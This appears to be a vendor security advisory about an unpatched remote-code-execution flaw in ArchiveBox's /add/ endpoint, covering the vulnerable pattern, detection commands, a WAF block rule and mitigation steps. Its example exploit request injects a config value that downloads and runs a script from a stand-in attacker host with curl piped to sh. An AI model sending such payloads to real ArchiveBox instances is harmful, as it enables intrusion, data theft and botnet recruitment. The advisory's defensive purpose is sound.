ArchiveBox is a popular open-source web archiving tool used by indie hackers, archivists, and research teams. It saves web pages locally along with their assets, screenshots, PDFs, and WARC files. CVE-2026-42601 (CVSS 9.8) is a critical vulnerability in its /add/ endpoint: a user-supplied JSON config field is merged into the crawl configuration without validation, then exported as environment variables to the archive plugins. The result is arbitrary argument injection and remote code execution.
The painful detail: no official patch is available to date. All versions ≤ 0.8.6rc0 are vulnerable, and the only viable mitigation is to isolate or pull the service until a fix lands.
Technical Details
Vulnerable component
ArchiveBox exposes a web UI to add new URLs for archiving. The /add/ endpoint (the AddView in core/views.py) accepts a JSON config field originally intended to let an admin customize crawl behavior per URL (timeout, user-agent, etc.).
The problem: this JSON is merged directly into the global config without sanitization. Then, when archive plugins run (wget, youtube-dl, chrome --headless, singlefile, etc.), the resulting config is exported as environment variables to the child process.
Exploitation path
# Reconstructed pseudo-code — vulnerable pattern
def AddView(request):
    url = request.POST.get("url")
    user_config = json.loads(request.POST.get("config", "{}"))
    crawl_config = {**DEFAULT_CONFIG, **user_config}  # ⚠️ unvalidated merge
    for plugin in plugins:
        env = {k.upper(): str(v) for k, v in crawl_config.items()}  # ⚠️ every key becomes an env var
        subprocess.run([plugin.command, url], env=env)
An attacker sends a POST:
{
  "url": "https://example.com",
  "config": {
    "CHROME_BINARY": "/usr/bin/bash",
    "CHROME_ARGS": "-c 'curl attacker.com/p.sh | sh'"
  }
}
The Chrome plugin receives these env vars and, instead of launching the browser, runs bash with the payload.
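The root cause is the unvalidated merge, so one way to close this class of bug is an allowlist with per-key validation. The sketch below is a hypothetical illustration of that pattern, not ArchiveBox's actual code or fix: `ALLOWED_OVERRIDES`, `merge_user_config`, and the two permitted keys are assumptions chosen for the example.

```python
import json

# Hypothetical allowlist: the only keys a user may override, each with a validator.
# These names are illustrative and are not taken from ArchiveBox's source.
ALLOWED_OVERRIDES = {
    "TIMEOUT": lambda v: isinstance(v, int) and not isinstance(v, bool) and 1 <= v <= 600,
    "USER_AGENT": lambda v: isinstance(v, str) and len(v) <= 256 and v.isprintable(),
}


def merge_user_config(defaults: dict, raw_json: str) -> dict:
    """Merge user overrides into defaults, rejecting anything off the allowlist."""
    user_config = json.loads(raw_json or "{}")
    if not isinstance(user_config, dict):
        raise ValueError("config must be a JSON object")

    merged = dict(defaults)
    for key, value in user_config.items():
        validator = ALLOWED_OVERRIDES.get(key.upper())
        if validator is None:
            raise ValueError(f"config key not allowed: {key}")
        if not validator(value):
            raise ValueError(f"invalid value for {key}")
        merged[key.upper()] = value
    return merged
```

With this shape, a request carrying `{"CHROME_BINARY": "/usr/bin/bash"}` raises `ValueError` before anything reaches a subprocess, while `{"timeout": 30}` is accepted. Rejecting unknown keys outright, rather than silently dropping them, also leaves a clear signal in the logs.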
Characteristics
| Field | Value |
|---|---|
| CVSS 3.1 | 9.8 (CRITICAL) |
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-78 (OS Command Injection) + CWE-454 (External Initialization of Trusted Variables) |
| Authentication | None by default on public deployments |
| Fix status | ❌ No official patch available |
Affected Products and Versions
| Product | Affected versions | Patched version |
|---|---|---|
| ArchiveBox | ≤ 0.8.6rc0 (all current versions) | ❌ None |
Check your version:
# Docker
docker exec archivebox archivebox version
# Pip
pip show archivebox | grep Version
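For fleets with several pip-based installs, the same check can be scripted. This is a minimal sketch that compares a version string against the `0.8.6rc0` bound given in the table above; the parser is deliberately simplified (it handles only `X.Y.Z` and `X.Y.ZrcN`, not full PEP 440), and the function names are illustrative.

```python
import re
from importlib.metadata import PackageNotFoundError, version

LAST_AFFECTED = "0.8.6rc0"  # upper bound stated in this advisory

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")


def version_key(text: str) -> tuple:
    """Turn 'X.Y.Z' or 'X.Y.ZrcN' into a sortable tuple (simplified, not full PEP 440)."""
    match = _VERSION_RE.match(text.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {text!r}")
    major, minor, patch, rc = match.groups()
    # A final release sorts after every release candidate of the same X.Y.Z.
    rc_rank = int(rc) if rc is not None else float("inf")
    return (int(major), int(minor), int(patch), rc_rank)


def is_affected(installed: str) -> bool:
    """True when the version is at or below the last affected release."""
    return version_key(installed) <= version_key(LAST_AFFECTED)


def installed_archivebox_version():
    """Return the pip-installed ArchiveBox version, or None if it is not installed."""
    try:
        return version("archivebox")
    except PackageNotFoundError:
        return None
```

`installed_archivebox_version()` only sees the Python environment it runs in, so for Docker deployments it would have to run inside the container.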
Exploitation and Impact
Real exposure surface
Many ArchiveBox instances are publicly exposed without authentication:
- Personal hosting by amateur archivists
- University libraries running ArchiveBox as a private Wayback Machine
- Community platforms (web memory, citizen journalism)
Shodan and Censys scans regularly show thousands of reachable instances. Any instance whose /add/ endpoint accepts unauthenticated requests is immediately exploitable.
Post-exploitation impact
- RCE inside the ArchiveBox container/host: access to the filesystem and to stored archives
- Theft of archived data: for journalistic or research content, this can include sensitive sources, documented leaks
- LAN pivot: ArchiveBox often runs on a homelab or shared VPS
- Botnet recruitment / cryptomining: CPU is plentiful given the crawl workload
Public exploit
No detailed public PoC yet, but the exploit is trivial given the public description. Expect 24-48h before automated scanners catch up.
Detection and IOCs
ArchiveBox logs
# Hunt /add/ calls with non-standard config JSON bodies
# (only works if your logging captures request bodies; default access logs usually do not)
grep -E "POST /add" /var/log/archivebox/access.log | \
  grep -E "config.*CHROME|config.*BINARY|config.*PATH"
System logs
# Processes started by ArchiveBox with unexpected binaries
# ([a]rchivebox keeps grep from matching its own command line)
ps -ef | grep -i "[a]rchivebox" | grep -vE "wget|chrome|python|node"
# Suspicious env vars injected into child processes
# (inspect via /proc)
# -d, joins multiple parent PIDs with commas, the list format pgrep -P expects
for pid in $(pgrep -P "$(pgrep -d, archivebox)"); do
  cat "/proc/$pid/environ" 2>/dev/null | tr '\0' '\n' | grep -iE "binary|command|args"
done
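The /proc inspection can also be done from a script, which makes it easier to feed results into an alerting pipeline. The sketch below parses the NUL-separated format of `/proc/<pid>/environ` and keeps variables whose name matches the same pattern as the grep; `parse_environ` and `suspect_vars` are illustrative names. Unlike the grep, it matches variable names only, not values.

```python
import re

# Same pattern as the grep in the shell loop, applied to variable names only.
SUSPECT_KEY = re.compile(r"binary|command|args", re.IGNORECASE)


def parse_environ(raw: bytes) -> dict:
    """Parse the NUL-separated KEY=VALUE format of /proc/<pid>/environ."""
    env = {}
    for entry in raw.split(b"\0"):
        if b"=" not in entry:
            continue  # skip the empty trailing entry and malformed ones
        key, _, value = entry.partition(b"=")
        env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def suspect_vars(raw: bytes) -> dict:
    """Return only the variables whose name matches the suspect pattern."""
    return {k: v for k, v in parse_environ(raw).items() if SUSPECT_KEY.search(k)}
```

On a Linux host it could be called as `suspect_vars(open(f"/proc/{pid}/environ", "rb").read())` for each child PID. Legitimate configuration can also contain names such as `CHROME_BINARY`, so the values need a human look before raising an alarm.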
Indicators of compromise
- Unexpected outbound connections from the ArchiveBox container/host
- Binary files appearing in /tmp, /var/tmp, /dev/shm
- Crontab or systemd service modifications
- Abnormal network traffic to non-archived destinations
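The file-based indicator in the list above lends itself to a quick automated sweep. The following is a minimal sketch that lists recently modified regular files with an execute bit set; the function name and the 24-hour default window are assumptions, and an attacker can reset timestamps, so an empty result proves nothing.

```python
import os
import stat
import time


def recent_executables(directories, max_age_hours=24.0):
    """List regular files with an execute bit set that changed within the window."""
    cutoff = time.time() - max_age_hours * 3600
    hits = []
    for directory in directories:
        for root, _dirs, files in os.walk(directory):
            for name in files:
                path = os.path.join(root, name)
                try:
                    info = os.lstat(path)
                except OSError:
                    continue  # file vanished or is unreadable
                is_regular = stat.S_ISREG(info.st_mode)
                is_executable = bool(info.st_mode & 0o111)
                if is_regular and is_executable and info.st_mtime >= cutoff:
                    hits.append(path)
    return sorted(hits)
```

A typical call would be `recent_executables(["/tmp", "/var/tmp", "/dev/shm"])`, run inside the container as well as on the host.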
Mitigation — Without an Official Patch
Option 1 — Immediate network isolation
If your ArchiveBox is internet-exposed:
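# Block all incoming HTTP requests from outside the LAN
# (the allow rule goes first: ufw applies the first matching rule)
sudo ufw allow from 192.168.1.0/24 to any port 8000 proto tcp
sudo ufw deny in 8000/tcp
# Or via Docker
# (ports published by Docker typically bypass ufw, so prefer the loopback bind for containers)
# Update docker-compose to bind on 127.0.0.1 only
ports:
  - "127.0.0.1:8000:8000"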
Then reload:
docker compose up -d
Option 2 — Force authentication
ArchiveBox supports account-based login. Verify it's enabled:
# ArchiveBox config (option names can vary between releases; confirm with `archivebox config`)
archivebox config --set PUBLIC_INDEX=False
archivebox config --set PUBLIC_ADD_VIEW=False
archivebox config --set REQUIRE_LOGIN=True
Then create an admin account if not done:
archivebox manage createsuperuser
⚠️ This is a partial mitigation: an attacker who guesses or phishes an admin account can still exploit.
Option 3 — Reverse proxy with WAF
If you must keep public exposure (not recommended), put Nginx + ModSecurity in front:
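location /add/ {
    # Block requests containing suspect patterns in the JSON body
    # Caveat: nginx evaluates "if" before the request body is read, so
    # $request_body can be empty at this point; a ModSecurity rule is the
    # more reliable place for body inspection.
    if ($request_body ~ "(_BINARY|_COMMAND|_ARGS|PATH|/bin/|/usr/bin/)") {
        return 403;
    }
    proxy_pass http://archivebox:8000;
}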
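A pattern filter like this is easy to bypass when it only sees the raw body: in a form-encoded POST, `/bin/` arrives as `%2Fbin%2F`. The sketch below shows the same pattern list applied after URL-decoding, as it might run in a hypothetical filtering proxy or middleware. It matches case-insensitively, a deliberate difference from the nginx `~` operator, because the reconstructed pseudo-code uppercases keys before export and a lowercase key would otherwise slip through.

```python
import re
from urllib.parse import unquote_plus

# Same pattern list as the nginx rule, matched case-insensitively (see lead-in).
SUSPECT_BODY = re.compile(r"(_BINARY|_COMMAND|_ARGS|PATH|/bin/|/usr/bin/)", re.IGNORECASE)


def is_suspect_body(raw_body: str, max_decode_rounds: int = 3) -> bool:
    """Match the patterns against the raw body and its URL-decoded forms."""
    current = raw_body
    for _ in range(max_decode_rounds + 1):
        if SUSPECT_BODY.search(current):
            return True
        decoded = unquote_plus(current)
        if decoded == current:
            break  # nothing left to decode
        current = decoded
    return False
```

This remains a denylist: JSON unicode escapes and keys outside the pattern list still get through, so it reduces noise from opportunistic scanners rather than closing the hole.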
Option 4 — Pull the service
For production instances holding sensitive data: shut down the service until the ArchiveBox team ships an official patch. It's painful but the only option that fully eliminates the risk.
docker compose stop archivebox
Proactive watch
Subscribe to the ArchiveBox GitHub repo to be notified the moment a patch lands:
https://github.com/ArchiveBox/ArchiveBox/releases
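If email notifications are not practical, the releases page can be polled from a cron job. The sketch below uses GitHub's REST endpoint for the latest release and compares its tag with the last one seen; the function names are illustrative, and storing the last-seen tag between runs is left out. That endpoint skips drafts and pre-releases, so a fix shipped only as a release candidate would not show up here.

```python
import json
import urllib.request

# GitHub REST endpoint for the latest published (non-prerelease) release.
RELEASES_API = "https://api.github.com/repos/ArchiveBox/ArchiveBox/releases/latest"


def tag_from_payload(payload: bytes) -> str:
    """Extract the release tag from a GitHub 'latest release' JSON response."""
    return json.loads(payload)["tag_name"]


def fetch_latest_tag(url: str = RELEASES_API, timeout: float = 10.0) -> str:
    """Fetch the tag of the latest release over HTTPS."""
    request = urllib.request.Request(url, headers={"Accept": "application/vnd.github+json"})
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return tag_from_payload(response.read())


def new_release_available(latest_tag: str, last_seen_tag: str) -> bool:
    """A changed tag means a new release was published; it does not prove a fix."""
    return latest_tag.strip() != last_seen_tag.strip()
```

A new tag is only a prompt to read the release notes: whether it actually addresses CVE-2026-42601 still has to be confirmed by hand.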
Why Continuous Monitoring of Self-Hosted Stacks Matters
Self-hosted tools (ArchiveBox, Vaultwarden, Bitwarden CE, Jellyfin, Nextcloud, Gitea…) are widely deployed in homelabs and SMBs, often without security visibility. A CVE like CVE-2026-42601, with no patch, no wide announcement, and no CISA KEV entry, can go unnoticed for weeks while being trivially exploitable.
With cveo.tech, inventory your self-hosted services alongside your core systems and get automatic alerts the moment a critical CVE targets one of your exact versions. Even when the upstream maintainer stays quiet, your watch stays current.